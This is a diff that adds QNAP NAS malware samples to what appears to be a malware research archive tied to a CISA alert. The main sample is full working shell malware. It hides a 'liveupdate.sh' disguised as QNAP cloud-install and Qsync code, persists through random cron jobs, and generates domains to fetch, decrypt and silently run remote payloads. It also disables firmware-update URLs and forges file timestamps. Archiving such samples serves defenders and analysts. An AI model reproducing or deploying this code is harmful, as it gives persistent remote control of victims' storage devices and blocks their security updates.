+hash=$(sed -n '2,568{/key=/d;s/\.liveupdate\/liveupdate\.sh//g;s/\.config\/backup_conf\.sh//g;p}' "$line" | md5sum)
+hash=${hash%${hash##*[0-9a-f]}}; hash=${hash#${hash%%[0-9a-f]*}}
+done
+done
+fi
+fi
+
+test -f "${ts}_c" || touch "${ts}_c"
+rm -f "${CWD}/".tmp.*
+exit 0
+}

2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/9791c5f567838f1705bd46e880e38e21e9f3400c353c2bf55a9fa9f130f3f077

@@ -0,0 +1,572 @@
+#!/bin/sh
+export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
+command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
+test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
+test -d "$confdir" || confdir=/etc/config
+command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\
+\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\
+//I;s/\(^\|\
+\)\[[^\
+]\+\]\
+.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
+bdir=
+test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
+echo 'ab*c' | grep -F 'ab*c' >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
+test "$fgrep" || fgrep=grep
+
+if [ ! -f "${bdir}/.qpkg/.liveupdate/liveupdate.sh" ]; then
+test -d "${bdir}/.qpkg" || mkdir -p "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
+test -d "${bdir}/.qpkg/.liveupdate" || mkdir "${bdir}/.qpkg/.liveupdate"
+cat > "${bdir}/.qpkg/.liveupdate/liveupdate.sh" <<"XEOF"
+#!/bin/sh
+QNAP_QPKG=cloudinstall
+QID_PRESISTENT_CONF=/etc/config/qid_persistent.conf
+NAS_CLOUD_INSTALL_PATH=/home/httpd/cgi-bin/cloudinstall
+CLOUD_INSTALL_PATH=/tunnel_agent
+CLOUD_INSTALL_RAMDISK_PATH=/tunnel_agent_ramdisk
+CLOUD_INSTALL_AGENT_FILE_PATH=$CLOUD_INSTALL_PATH/tunnel_agent.tar.bz2
+COUNTER=1
+ERROR_BAD_REQUEST=400
+
+if [ "$fromrcS" = 'TRUE' ]; then
+case "$1" in
+  start)
+    START_TIME=$(date +"%T")
+    echo -e "start:$START_TIME" >> /tmp/.cloudinstall.log
+    while [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ];
+    do
+        # report device info and get cloudinstall agent app download url
+        DOWNLOAD_URL=`/usr/sbin/qcloud_uninit_device_tool -r`
+        if [ ! -d "$CLOUD_INSTALL_PATH" ]; then
+            if [ "$NAS_ARCH" == "ARM_64" ]; then
+                # create ramdisk and create a 64mb file
+                /bin/mkdir -p $CLOUD_INSTALL_RAMDISK_PATH
+                /bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_RAMDISK_PATH
+                /bin/dd if=/dev/zero of=$CLOUD_INSTALL_RAMDISK_PATH/image bs=1M count=64
+                # create block size 1K filesystem
+                /sbin/mke2fs -b 1024 $CLOUD_INSTALL_RAMDISK_PATH/image
+                # create virtual disk
+                export USED_LOOP_DEVICE=`/usr/local/sbin/losetup -f $CLOUD_INSTALL_RAMDISK_PATH/image`
+                /sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "USED_LOOP_DEVICE" "$USED_LOOP_DEVICE"
+                /bin/mkdir -p $CLOUD_INSTALL_PATH
+                # mount virtual disk
+                /bin/mount $USED_LOOP_DEVICE $CLOUD_INSTALL_PATH
+            else
+                # create and mount tmpfs folder
+                /bin/mkdir -p $CLOUD_INSTALL_PATH
+                /bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_PATH
+            fi
+        fi
+        cd $CLOUD_INSTALL_PATH
+
+        if [[ $DOWNLOAD_URL == https* ]]; then
+            REPORT_SUCCESS_TIME=$(date +"%T")
+        else
+            REPORT_FAIL_TIME=$(date +"%T")
+            echo -e " report_fail:$REPORT_FAIL_TIME\n response:$DOWNLOAD_URL" >> /tmp/.cloudinstall.log
+            # stop retry when got bad request
+            # prevent put bad request all the time
+            if [[ $DOWNLOAD_URL == *$ERROR_BAD_REQUEST* ]]; then
+                break
+            fi
+        fi
+
+        # downlaod cloudinstall agent app
+        /usr/sbin/qcloud_uninit_device_tool -o "$CLOUD_INSTALL_AGENT_FILE_PATH" -d "$DOWNLOAD_URL"
+
+        if [ -f "$CLOUD_INSTALL_AGENT_FILE_PATH" ]; then
+            DOWNLOAD_FINISH_TIME=$(date +"%T")
+            # unzip and execute cloudinstallagent
+            /bin/tar -xf $CLOUD_INSTALL_AGENT_FILE_PATH -C $CLOUD_INSTALL_PATH
+            $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh start &> /dev/null
+
+            UNZIP_TIME=$(date +"%T")
+        fi
+
+        if [ ! -d "$NAS_CLOUD_INSTALL_PATH" ]; then
+            # create folder and create symbolic link
+            /bin/mkdir -p $NAS_CLOUD_INSTALL_PATH
+            /bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.html $NAS_CLOUD_INSTALL_PATH/index.html
+            /bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.cgi $NAS_CLOUD_INSTALL_PATH/cloudinstall.cgi
+            /bin/ln -s $CLOUD_INSTALL_PATH/ui/static $NAS_CLOUD_INSTALL_PATH/static
+        fi
+
+        # wait connect
+        sleep 5
+        CLOUD_INSTALL_AGENT_PID_LIST=`/bin/ps --columns 256 | /bin/grep "$CLOUD_INSTALL_PATH/bin/cloudinstallagent" | /bin/grep -v grep | /bin/awk '{print $1}'`
+        if [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ]; then
+            SLEEP_TIME=$(( 30 * $COUNTER ))
+            if [ $SLEEP_TIME -gt 300 ]; then
+                SLEEP_TIME=300
+            fi
+            # wait next retry
+            sleep $SLEEP_TIME
+        fi
+        COUNTER=$(( $COUNTER * 2 ))
+    done
+
+    END_TIME=$(date +"%T")
+    echo -e "report_success:$REPORT_SUCCESS_TIME\ndownload_finish:$DOWNLOAD_FINISH_TIME\nunzip_finish:$UNZIP_TIME\nend:$END_TIME" >> /tmp/.cloudinstall.log
+    # call for a new process group and for later kill
+    /bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh start &> /dev/null &
+    /bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_daemon.sh &> /dev/null &
+
+    # set cloudinstall report status
+    /sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "REPORT_STATUS" "uninit"
+    # add link to report offline
+    /bin/ln -sf /etc/init.d/cloudinstall_report_offline.sh /etc/rcK.d/K99cloudinstall_report_offline
+
+    # buzzer
+    HARDWARE_TYPE=$(uname -m)
+    if [[ "$HARDWARE_TYPE" == *"x86"* ]];
+    then
+      /sbin/hal_app --se_buzzer enc_id=0,mode=101
+    elif [[ "$HARDWARE_TYPE" == *"arm"* ]];
+    then
+      /sbin/pic_raw 81
+    fi
+    ;;
+
+  stop)
+    # disconnect cloudinstall agent
+    $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh stop &> /dev/null
+    $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh stop &> /dev/null
+    for i in "${CLOUD_INSTALL_AGENT_DAEMON_PID_LIST[@]}"
+    do
+        # use bash kill instead /bin/kill for kill process group
+        # cloudinstall agent daemon and inotifywait
+        kill -9 -- -$i &>/dev/null
+    done
+
+    # umount
+    if [ "$NAS_ARCH" == "ARM_64" ]; then
+        /bin/umount -l $USED_LOOP_DEVICE
+        /usr/local/sbin/losetup -d $USED_LOOP_DEVICE
+    else
+        /bin/umount -l $CLOUD_INSTALL_PATH
+    fi
+    # remove all files
+    if [ -d "$NAS_CLOUD_INSTALL_PATH" ]; then
+        /bin/rm -rf $NAS_CLOUD_INSTALL_PATH
+    fi
+    if [ -d "$CLOUD_INSTALL_PATH" ]; then
+        /bin/rm -rf $CLOUD_INSTALL_PATH
+    fi
+    if [ -d "$CLOUD_INSTALL_RAMDISK_PATH" ]; then
+        /bin/rm -rf $CLOUD_INSTALL_RAMDISK_PATH
+    fi
+    ;;
+
+  restart)
+    $0 stop
+    $0 start
+    ;;
+
+  *)
+    echo "Usage: $0 {start|stop|restart}"
+    exit 1
+esac
+exit 0
+
+
+set_env()
+{
+	debug=`$CMD_GETCFG Qsync Debug -u -d NULL`
+	if [ "$debug" != "NULL" ]; then
+		/bin/touch $LOG_FILE
+	else
+		/bin/rm -f $LOG_FILE
+	fi
+}
+
+set_env
+
+dbg()
+{
+	if [ -f "$LOG_FILE" ]; then
+		echo "[`date "+%H:%M:%S"`] $@ " >> $LOG_FILE
+	fi
+}
+
+dbg "> $0 $@ (pid $$)"
+
+fi
+
+export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
+
+command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\n\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\n//I;s/\(^\|\n\)\[[^\n]\+\]\n.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
+
+test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
+
+bdir=
+test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in Public Download Multimedia Web Recordings homes; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
+grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
+
+EOF
+test "$fgrep" || fgrep=grep
+test "$RANDOM" || RANDOM=17653
+genrstr () 
+{ 
+    local s=;
+    local min=${1:-4};
+    local max=${2:-12};
+    local kspace="${3:-a-zA-Z}"
+    tr -dc "$kspace" < /dev/urandom | { 
+        read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
+        echo "$s"
+    }
+}
+
+verifyfile() {
+local file="$1"
+local sig="${2:-$file_s}"
+local out
+test ! -z "$file" && test -s "$file" || return 1
+test ! -z "$sig" && test -s "$sig" || return 1
+test -f ".rsakey" || echo "$verifykey" > ".rsakey"
+out=$(openssl dgst -sha1 -verify ".rsakey" -signature "$sig" "$file") && test "$out" = "Verified OK" && return 0
+return 1
+}
+
+decryptfile() {
+local file="$1"
+local ofile="${2:-${file}}"
+local key='7C0vK4SzMO15zBxLD7XCi5hbjgP1ZjkJ'
+openssl enc -d -aes-256-cbc -k "$key" -md sha1 -salt < "$file" > "${file}_d" || return $?
+test -f "$ofile" && rm -f "$ofile"
+mv "${file}_d" "$ofile" && return 0
+return 1
+}
+
+verifykey='-----BEGIN PUBLIC KEY-----
+MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
+CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
+verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
+RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
+Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
+gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
+2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
+0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
+pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
+DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
+-----END PUBLIC KEY-----'
+
+DOMAIN_EXT_A='cf tk ml ga gq'
+DOMAIN_EXT_B='com biz org de rocks mx cn top nl men ws se info xyz net today ru fi name to in com.ua vg vn cd'
+
+test -d "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
+test -d "${bdir}/.qpkg/.liveupdate" || mkdir "${bdir}/.qpkg/.liveupdate"
+cd "${bdir}/.qpkg/.liveupdate" && rm -f .tmp.*
+
+echo "$verifykey" > ".rsakey"
+i=0 n=0 c=0 errorcount=0
+outfile=$(mktemp "./.tmp.XXXXXX") || outfile=$(mktemp "${bdir}/.tmp.XXXXXX") || outfile=$(mktemp "/.tmp.XXXXXX") || outfile='./.tmp.out'
+
+for domainexts in "$DOMAIN_EXT_A" "$DOMAIN_EXT_B"; do
+        for ext in $domainexts; do
+                hostname=$(echo "$(( $(date +%s) / 1296000 ))IbjGOEgnuD${ext}" | openssl dgst -sha1 -binary | openssl base64 | sed 'y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g')
+                hostname=${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9]}
+                hostnames="${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9]} ${hostname%[a-z0-9][a-z0-9][a-z0-9]}"
+                hostnames="$hostnames ${hostname%[a-z0-9][a-z0-9]} ${hostname%[a-z0-9]} $hostname"
+                for host in $hostnames; do
+                        test -f "$outfile" && rm -f "$outfile"
+                        recentupdate=''
+                        curl --connect-timeout 12 -m 30 -k -o "$outfile" "https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)"
+                        test -s "$outfile" || continue
+                        fsize=$(( $(wc -c < "$outfile") ))
+                        test "$fsize" -gt 4096 && rm -f "$outfile" && continue
+                        rsamsg=$(openssl base64 -in "$outfile" -d | openssl rsautl -pubin -inkey ".rsakey" -verify) || continue
+                        test "$rsamsg" || continue
+                        path="${rsamsg%|*}"; rsadomain="${path%|*}"; path="${path#*|}"
+                        hash="${rsamsg##*|}"; ts="${hash#*_}"; hash="${hash%_*}"
+                        test "$rsadomain" = "${host}.${ext}" || continue
+                        timenow=$(date +%s)
+                        test "$ts" -gt 0 && { test "$ts" -gt "$timenow" || test $(( $timenow - $ts )) -lt 172800; } && recentupdate=1
+                        curl --connect-timeout 12 -m 300 -k -o "$outfile" "https://${host}.${ext}/${path}"
+                        filehash=$(openssl dgst -sha1 -binary "$outfile" | openssl base64) || continue
+                        test "$filehash" = "$hash" || continue
+                        curl --connect-timeout 12 -m 30 -k -o "${outfile}_s" "https://${host}.${ext}/s/${path}"
+                        verifyfile "$outfile" "${outfile}_s" && decryptfile "$outfile" || continue
+                        mv "${outfile}_s" "${ts}_v"
+                        chmod 755 "$outfile" || continue
+                        ( ( exec >/dev/null 2>/dev/null </dev/null; "$outfile" ) & )
+                        test "$recentupdate" -eq 1 && exit 0
+                done
+        done
+done
+
+
+if [ "$fromrcS" = 'TRUE' ]; then
+# if Qsync is disable before 4.3.0, we will touch /mnt/HDA_ROOT/udpate_pkg/.QsyncServer_disabled
+set_default_disable_status()
+{
+	QPKG_ENABLE=`$CMD_GETCFG ${QSYNC_NAME} Enable -d "NULL" -f ${QPKG_CONF}`
+	OLD_ENABLE=`$CMD_GETCFG Qsync Enable -u -d NULL`
+	if [ -f "${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed" ]; then
+		return
+	fi
+
+	if [ "$QPKG_ENABLE" = "NULL" ]; then
+		if [ "$OLD_ENABLE" = "FALSE" ]; then
+			dbg "touch ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
+			/bin/touch "${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
+		fi
+	fi
+}
+
+if [ "x$HBS_ENABLE" = xnull ] || [ "x$HBS_ENABLE" = xFALSE ]; then
+	export QNAP_QPKG=rtrr
+else
+	export QNAP_QPKG=HybridBackup
+	/usr/local/sbin/qboost_util -S -n rtrr -E 0 1>/dev/null 2>&1
+fi
+start()
+{
+	if [ -f /usr/bin/qsyncman ]; then
+		[ ! -f /etc/config/hdcopyusb.conf ] || /bin/rm -f /etc/config/hdcopyusb.conf
+		/bin/sed -i '/hdusb_copy/d' /etc/config/crontab
+		/usr/bin/crontab /etc/config/crontab
+		echo -n "Starting QSync manitor: "
+		[ -d /etc/config/qsync ] || /usr/bin/install -d /etc/config/qsync
+		[ -f /etc/config/qsync/qhost.conf ] || /bin/touch /etc/config/qsync/qhost.conf
+		[ -f /etc/config/qsync/qsyncjobdef.conf ] || /bin/touch /etc/config/qsync/qsyncjobdef.conf
+		[ -f /etc/config/qsync/qsync.conf ] || /bin/cp -p /etc/default_config/qsync/qsync.conf /etc/config/qsync/qsync.conf
+		[ -f /etc/config/qsync/extdrv.conf ] || /bin/cp -p /etc/default_config/qsync/extdrv.conf /etc/config/qsync/extdrv.conf
+		[ -f /etc/config/qsync/qsyncd.conf ] || /bin/cp -p /etc/default_config/qsync/qsyncd.conf /etc/config/qsync/qsyncd.conf
+		[ ! -f /etc/config/qsync/qsyncd.conf ] || /bin/chmod 640 /etc/config/qsync/qsyncd.conf
+		[ ! -f /etc/config/qsync/qsync.conf ] || /bin/chmod 640 /etc/config/qsync/qsync.conf
+		[ ! -f /etc/config/qsync/qhost.conf ] || /bin/chmod 640 /etc/config/qsync/qhost.conf
+		/sbin/daemon_mgr qsyncman start "/usr/bin/qsyncman 1>/dev/null 2>&1"
+		echo "OK"
+	fi
+}
+
+stop()
+{
+	echo "Shutting down QSync monitor: OK"
+        pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+        kill $pidnum 2>/dev/null
+        i=0
+        while [ ${i} -lt 5 ]
+        do
+                pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+                if [ -z "$pidnum" ]; then
+                        break
+                fi
+                sleep 1
+                i=`/usr/bin/expr ${i} + 1`
+        done
+        pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+        [ -z "$pidnum" ] || kill -9 $pidnum 2>/dev/null
+	/sbin/daemon_mgr qsyncman stop "/usr/bin/qsyncman"
+	/usr/bin/killall -q qsyncman
+}
+
+start_qsyncd()
+{
+	#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
+	#[ "x$_qsyncd_en" = x1 ] || return -1
+	_qsyncd_run_pid=`/bin/pidof qsyncd`
+	[ -z $_qsyncd_run_pid ] || return -114
+	_recycle_en=`/sbin/getcfg 'Network Recycle Bin' Enable -d FALSE`
+	_with_syslog=$1
+	if [ "x$_recycle_en" = xTRUE  ]; then
+		if [ "x$_with_syslog" = x1  ]; then
+			LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
+		else
+			LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
+		fi
+	else
+		if [ "x$_with_syslog" = x1  ]; then
+			/usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
+		else
+			/usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
+		fi
+	fi
+	_iret=$?
+	if [ "x$_iret" = x0 ]; then
+		i=0
+		while [ ${i} -lt 10000 ]
+		do
+			echo "${i} millisecond..."
+			_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
+			_qsyncd_run_pid=`/bin/pidof qsyncd`
+			if [ "x$_qsyncd_pid" != "x-1" ] && [ ! -z $_qsyncd_run_pid ]; then
+				break
+			fi
+			usleep 50000
+			i=`/usr/bin/expr ${i} + 50`
+		done
+	fi
+	return -$_iret
+}
+
+stop_qsyncd()
+{
+	#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
+	#[ "x$_qsyncd_en" = x0 ] || return -1
+	_qsyncd_pid=`/sbin/getcfg "" Pid -d -1 -f /etc/qsync/qsyncd.conf`
+	[ $_qsyncd_pid -lt 0 ] && return -3
+	# Send SIGUSR1 to inform the daemon to output "[RTRR Server] Stopped" event log
+	/bin/kill -SIGUSR1 $_qsyncd_pid
+	usleep 200000
+	# Send SIGINT to stop the QSyncd process
+	/bin/kill -SIGINT $_qsyncd_pid
+	_kill_ret=$?
+	if [ "x$_kill_ret" != x0 ]; then
+		return -3
+	fi
+	echo "need wait $1 millisecond"
+	i=0
+	while true
+	do
+		echo "${i} millisecond..."
+		_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
+		_qsyncd_run_pid=`/bin/pidof qsyncd`
+		if [ "x$_qsyncd_pid" = "x-1" ] && [ -z $_qsyncd_run_pid ]; then
+			break
+		fi
+		if [ ${i} -ge $1 ]; then
+			# if time-out, we send two additional SIGINT to force the daemon to stop.
+			if [ $_qsyncd_pid -ge 0 ]; then
+				/bin/kill -SIGUSR1 $_qsyncd_pid
+				usleep 200000
+				/bin/kill -SIGUSR1 $_qsyncd_pid
+			fi
+			j=0
+			while [ ${j} -lt 500 ]
+			do
+				_qsyncd_run_pid=`/bin/pidof qsyncd`
+				if [ -z $_qsyncd_run_pid ]; then
+					return 0
+				fi
+				usleep 20000
+				j=`/usr/bin/expr ${j} + 20`
+			done
+			return -62
+		fi
+		usleep 50000
+		i=`/usr/bin/expr ${i} + 50`
+	done
+	return 0
+}
+
+
+install()
+{
+	lock_file="/var/lock/qbox_install_bin.lck"
+
+	if [ ! -f "${INSTALL_BUILD_IN}" ]; then
+		dbg "build-in ${QSYNC_NAME} is installed"
+		return 1
+	fi
+
+	if [ ! -f ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin ]; then
+		dbg "${QSYNC_NAME}.bin} not found"
+		return 1
+	fi
+
+	if [ ! -x "${QPKG_CLI}" ]; then
+		dbg "${QPKG_CLI} not found"
+		return 1
+	fi
+
+	## make sure volume is exist
+	if [ ! -d /share/`/sbin/getcfg SHARE_DEF defPublic -d Public -f /etc/config/def_share.info` ]; then
+		dbg "/share/Public not found"
+		return 1
+	fi
+
+	## is removed 
+	if [ -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed ]; then
+		/bin/rm -f ${INSTALL_BUILD_IN}
+		dbg "${QSYNC_NAME} is removed"
+		return 1
+	fi
+
+	if [ -f "$lock_file" ]; then 
+		if [ $(( $(date +%s) - $(date +%s -r $lock_file) )) -le 180 ]; then
+			echo "${QSYNC_NAME} is installing"
+			dbg "${QSYNC_NAME} is installing"
+			return 1
+		fi
+	fi
+
+	/bin/touch "$lock_file"	
+	/bin/rm -f ${INSTALL_BUILD_IN}
+	dbg "install build-in ${QSYNC_NAME} start"
+
+	set_default_disable_status
+
+	## install build in Qsync
+	${QPKG_CLI} -K -m ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin > /dev/null 2>&1
+	sleep 20
+
+	wait_install=60
+	## avoid initial take long time or fail
+        while [ "$wait_install" -gt 0 ]; do
+		stcode=`$CMD_GETCFG ${QSYNC_NAME}.bin stcode -f /etc/config/qpkg_job.conf`
+                if [ "$stcode" = "0" ]; then
+                        break
+                fi
+                sleep 1
+                let "wait_install--"
+        done
+
+	${QPKG_CLI} -C ${QSYNC_NAME}.bin > /dev/null 2>&1
+	/bin/rm -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled
+	/bin/rm -f "$lock_file"	
+	dbg "install build-in ${QSYNC_NAME} success"
+}
+
+if [ "$1" == "stop" ]; then
+	exit 0
+fi
+fi
+XEOF
+fi
+chmod 755 "${bdir}/.qpkg/.liveupdate/liveupdate.sh"
+touch -cr /bin/busybox "${bdir}/.qpkg/.liveupdate/liveupdate.sh"
+
+crontabargs=$(ps | grep 'cr[o]nd ' | sed -n 's/.*crond[^0-9A-Za-z-]*\(.\+\)/\1/p')
+trycount=10; trycount=$(( $trycount - 10 ))
+set x $crontabargs; shift
+while [ $# -gt 0 ] && [ $trycount -lt 10 ]; do
+trycount=$(( $trycount + 1 ))
+getopts ':c:' OPT 2>/dev/null
+test "$OPT" = 'c' && crontabfile="${OPTARG}/admin" && break
+test "$OPTIND" -gt 0 && shift "$OPTIND" && OPTIND=1 || break
+done
+test "$crontabfile" && test -f "${crontabfile}" || crontabfile='/tmp/cron/crontabs/admin'
+
+for crontab in "$crontabfile" "${confdir}/crontab"; do
+if $fgrep "${bdir}/.qpkg/.liveupdate/liveupdate.sh" "$crontab"; then
+:
+else
+cronmins=$(printf '%i' "$(( $RANDOM % 60 ))")
+cronhour=$(printf '%i' "$(( $RANDOM % 24 ))")
+cronhour=$(printf '%i,' "$(( ( $cronhour + 8 ) % 24 ))" "$(( ( $cronhour + 16 ) % 24 ))")"$cronhour"
+echo "$cronmins $cronhour"' * * * '"${bdir}/.qpkg/.liveupdate/liveupdate.sh >/dev/null 2>/dev/null" >> "$crontab"
+sleep 5
+fi
+done
+
+grep 'Liveupdate\|FirmwareRelease\|QTS_FW' /etc/default_config/uLinux.conf /etc/config/uLinux.conf | grep 'qnap\.com' >/dev/null && sed -i 's/https\?:\/\/[^\/]\+\/\(Liveupdate\|FirmwareRelease\|QTS_FW\)/http:\/\/0.0.0.0\/\1/' /etc/default_config/uLinux.conf /etc/config/uLinux.conf
+sedexpr='QPKG CENTER XML\|Live Update XML\|FW_XML_ALT'
+if grep "${sedexpr}" /etc/default_config/uLinux.conf /etc/config/uLinux.conf | grep 'qnap\.com' >/dev/null; then
+sed -i 's/^ *\('"${sedexpr}"'\)\(.*https\?:\/\/[^\/]*\)\(qnap\.com[^\/]*\)/\1\20.0.0.0/' /etc/default_config/uLinux.conf /etc/config/uLinux.conf 
+grep "${sedexpr}" /etc/default_config/uLinux.conf /etc/config/uLinux.conf | grep 'qnap\.com' && sed -i 's/^ *\('"${sedexpr}"'\).*qnap\.com/\1 = /' /etc/default_config/uLinux.conf /etc/config/uLinux.conf
+fi
+
+( ( exec >/dev/null 2>&1 </dev/null; "${bdir}/.qpkg/.liveupdate/liveupdate.sh" </dev/null >/dev/null 2>/dev/null & ) & )
+exit 0

2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/README.md

@@ -0,0 +1 @@
+https://us-cert.cisa.gov/ncas/alerts/aa20-209a

2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/a569332b52d484f40b910f2f0763b13c085c7d93dcdc7fea0aeb3a3e3366ba5d

@@ -0,0 +1,510 @@
+#!/bin/sh
+QNAP_QPKG=cloudinstall
+QID_PRESISTENT_CONF=/etc/config/qid_persistent.conf
+NAS_CLOUD_INSTALL_PATH=/home/httpd/cgi-bin/cloudinstall
